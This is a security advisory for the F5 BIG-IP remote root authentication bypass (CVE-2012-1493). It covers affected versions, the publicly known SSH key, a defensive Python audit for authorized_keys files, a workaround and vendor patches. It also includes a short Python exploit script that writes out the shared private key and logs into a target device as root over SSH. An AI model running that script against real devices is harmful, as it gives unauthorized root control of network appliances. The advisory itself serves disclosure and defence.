F5 BIG-IP Remote Root Authentication Bypass Vulnerability

Published: 2012-06-11
Updated: 2012-06-12

Affected systems:
F5 BIG-IP LTM 9.0.0 - 9.4.8-HF4
F5 BIG-IP LTM 11.1.0 - 11.1.0-HF2
F5 BIG-IP LTM 11.0.0 - 11.0.0-HF1
F5 BIG-IP LTM 10.0.0 - 10.2.3-HF1
F5 BIG-IP GTM 9.2.2 - 9.4.8-HF4
F5 BIG-IP GTM 11.1.0 - 11.1.0-HF2
F5 BIG-IP GTM 11.0.0 - 11.0.0-HF1
F5 BIG-IP GTM 10.0.0 - 10.2.3-HF1
F5 BIG-IP ASM 9.2.2 - 9.4.8-HF4
F5 BIG-IP ASM 11.1.0 - 11.1.0-HF2
F5 BIG-IP ASM 11.0.0 - 11.0.0-HF1
F5 BIG-IP ASM 10.0.0 - 10.2.3-HF1
F5 BIG-IP Link Controller 9.2.2 - 9.4.8-HF4
F5 BIG-IP Link Controller 11.1.0 - 11.1.0-HF2
F5 BIG-IP Link Controller 11.0.0 - 11.0.0-HF1
F5 BIG-IP Link Controller 10.0.0 - 10.2.3-HF1
F5 BIG-IP PSM 9.2.2 - 9.4.8-HF4
F5 BIG-IP PSM 11.1.0 - 11.1.0-HF2
F5 BIG-IP PSM 11.0.0 - 11.0.0-HF1
F5 BIG-IP PSM 10.0.0 - 10.2.3-HF1
F5 BIG-IP WOM 11.1.0 - 11.1.0-HF2
F5 BIG-IP WOM 11.0.0 - 11.0.0-HF1
F5 BIG-IP WOM 10.0.0 - 10.2.3-HF1
F5 BIG-IP APM 11.1.0 - 11.1.0-HF2
F5 BIG-IP APM 11.0.0 - 11.0.0-HF1
F5 BIG-IP APM 10.0.0 - 10.2.3-HF1
F5 BIG-IP Edge Gateway 11.1.0 - 11.1.0-HF2
F5 BIG-IP Edge Gateway 11.0.0 - 11.0.0-HF1
F5 BIG-IP Edge Gateway 10.0.0 - 10.2.3-HF1
F5 BIG-IP Analytics 11.1.0 - 11.1.0-HF2
F5 BIG-IP Analytics 11.0.0 - 11.0.0-HF1
F5 Enterprise Manager 2.3.0 - 2.3.0-HF2
F5 Enterprise Manager 2.2.0 (no HF)
F5 Enterprise Manager 2.1.0 - 2.1.0-HF1
F5 Enterprise Manager 2.0.x
F5 Enterprise Manager 1.x
Unaffected systems:
F5 BIG-IP LTM >= 9.4.8-HF5
F5 BIG-IP LTM >= 11.1.0-HF3
F5 BIG-IP LTM >= 11.0.0-HF2
F5 BIG-IP LTM >= 10.2.4
F5 BIG-IP GTM >= 11.1.0-HF3
F5 BIG-IP GTM >= 11.0.0-HF2
F5 BIG-IP GTM >= 10.2.4
F5 BIG-IP GTM >= 9.4.8-HF5
F5 BIG-IP ASM >= 11.1.0-HF3
F5 BIG-IP ASM >= 11.0.0-HF2
F5 BIG-IP ASM >= 10.2.4
F5 BIG-IP ASM >= 9.4.8-HF5
F5 BIG-IP Link Controller >= 11.1.0-HF3
F5 BIG-IP Link Controller >= 11.0.0-HF2
F5 BIG-IP Link Controller >= 10.2.4
F5 BIG-IP Link Controller >= 9.4.8-HF5
F5 BIG-IP PSM >= 11.1.0-HF3
F5 BIG-IP PSM >= 11.0.0-HF2
F5 BIG-IP PSM >= 10.2.4
F5 BIG-IP PSM >= 9.4.8-HF5
F5 BIG-IP WOM >= 11.1.0-HF3
F5 BIG-IP WOM >= 11.0.0-HF2
F5 BIG-IP WOM >= 10.2.4
F5 BIG-IP APM >= 11.1.0-HF3
F5 BIG-IP APM >= 11.0.0-HF2
F5 BIG-IP APM >= 10.2.4
F5 BIG-IP Edge Gateway >= 11.1.0-HF3
F5 BIG-IP Edge Gateway >= 11.0.0-HF2
F5 BIG-IP Edge Gateway >= 10.2.4
F5 BIG-IP Analytics >= 11.1.0-HF3
F5 BIG-IP Analytics >= 11.0.0-HF2
F5 Enterprise Manager >= 2.3.0-HF3
F5 Enterprise Manager >= 2.2.0-HF1
F5 Enterprise Manager >= 2.1.0-HF2
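Description:
BUGTRAQ ID: 53897
CVE ID: CVE-2012-1493

F5 BIG-IP products provide enterprises with integrated application delivery services such as acceleration, security, access control and high availability.

The BIG-IP 11.x, 10.x and 9.x platforms are implemented in a way that allows an unauthenticated user to bypass authentication and log in to the device as the root user. The SSH private key corresponding to the public key below is publicly known and is present on all vulnerable devices: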

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvIhC5skTzxyHif/7iy3yhxuK6/OB13hjPqrskogkYFrcW8OK4VJT+5+Fx7wd4sQCnVn8rNqahw/x6sfcOMDI/Xvn4yKU4t8TnYf2MpUVr4ndz39L5Ds1n7Si1m2suUNxWbKv58I8+NMhlt2ITraSuTU0NGymWOc8+LNi+MHXdLk= SCCP Superuser

Its fingerprint is:
71:3a:b0:18:e2:6c:41:18:4e:56:1e:fd:d2:49:97:66

If an attacker gains full control of the device, they can go on to launch attacks against other hosts on the associated network.

<*Source: Florent Daigniere (nextgens@freenetproject.org)
  
  Links: https://www.trustmatta.com/advisories/MATTA-2012-002.txt
        http://secunia.com/advisories/49396/
*>

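Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

Dave Kennedy (ReL1K) provided the following test method: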

#!/usr/bin/python
#
# Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
#
# Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
# http://www.secmaniac.com
#
#
import subprocess,os
  
filewrite = file("priv.key", "w")
filewrite.write("""-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----""")
filewrite.close()
subprocess.Popen("chmod 700 priv.key", shell=True).wait()
  
ipaddr=raw_input("Enter the IP address of the F5: ")
subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait()
  
if os.path.isfile("priv.key"):
    os.remove("priv.key")

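Recommendations:
Temporary workaround:

If you cannot install the patch or upgrade immediately, NSFOCUS recommends taking the following measures to reduce the threat:

* Use the BIG-IP's own settings or a perimeter firewall to allow only trusted IP addresses to access the SSH service port.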
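
An added example, not part of the original advisory or of any F5 tooling: a Python 3 audit that checks authorized_keys content for the public key published in the description, matching on the decoded key blob and on the MD5 fingerprint so that a changed comment or a prepended options field does not hide the entry. The sample input, the second key and the function names are constructed for illustration; which files to feed it on a given device is left to the operator.

```python
import base64
import hashlib
import re

# Public key blob and MD5 fingerprint copied from the advisory text above.
KNOWN_BAD_KEY_B64 = (
    "AAAAB3NzaC1yc2EAAAABIwAAAIEAvIhC5skTzxyHif/7iy3yhxuK6/OB13hjPqrskogk"
    "YFrcW8OK4VJT+5+Fx7wd4sQCnVn8rNqahw/x6sfcOMDI/Xvn4yKU4t8TnYf2MpUVr4nd"
    "z39L5Ds1n7Si1m2suUNxWbKv58I8+NMhlt2ITraSuTU0NGymWOc8+LNi+MHXdLk="
)
KNOWN_BAD_FINGERPRINT = "71:3a:b0:18:e2:6c:41:18:4e:56:1e:fd:d2:49:97:66"
# Key type followed by its base64 blob; anything before it is an options field.
KEY_RE = re.compile(r"(?:^|\s)(ssh-rsa|ssh-dss|ssh-ed25519|ecdsa-sha2-\S+)\s+([A-Za-z0-9+/]+={0,2})")

def md5_fingerprint(blob):
    """Colon-separated MD5 of the raw key blob, the format the advisory quotes."""
    digest = hashlib.md5(blob).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))

def find_known_key(text):
    """Return [(line_number, fingerprint)] for entries holding the advisory's key."""
    bad_blob = base64.b64decode(KNOWN_BAD_KEY_B64)
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        match = None if line.startswith("#") else KEY_RE.search(line)
        if not match:
            continue
        try:
            blob = base64.b64decode(match.group(2), validate=True)
        except ValueError:
            continue  # malformed base64, not a usable key entry
        fingerprint = md5_fingerprint(blob)
        if blob == bad_blob or fingerprint == KNOWN_BAD_FINGERPRINT:
            hits.append((number, fingerprint))
    return hits

# Constructed sample: the advisory's key twice (once behind options) and an unrelated all-zero key.
OTHER = base64.b64encode(b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + bytes(32)).decode()
SAMPLE = "\n".join([
    "# constructed authorized_keys content",
    "ssh-rsa " + KNOWN_BAD_KEY_B64 + " SCCP Superuser",
    'from="192.0.2.0/24",no-pty ssh-rsa ' + KNOWN_BAD_KEY_B64 + " renamed",
    "ssh-ed25519 " + OTHER + " ops@example.invalid",
])

if __name__ == "__main__":
    for number, fingerprint in find_known_key(SAMPLE):
        print("line %d: known key present, MD5 fingerprint %s" % (number, fingerprint))
```

Any hit means the host still accepts the publicly known private key and should be upgraded to a fixed version listed below.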

Vendor patch:

F5
--
The vendor has fixed this security issue in the following versions:
F5 BIG-IP 9.4.8-HF5 and later
F5 BIG-IP 10.2.4 and later
F5 BIG-IP 11.0.0-HF2 and later
F5 BIG-IP 11.1.0-HF3 and later
F5 Enterprise Manager 2.1.0-HF2 and later
F5 Enterprise Manager 2.2.0-HF1 and later
F5 Enterprise Manager 2.3.0-HF3 and later

Vendor security advisory:
http://support.f5.com/kb/en-us/solutions/public/13000/600/sol13600.html

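This vulnerability entry was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.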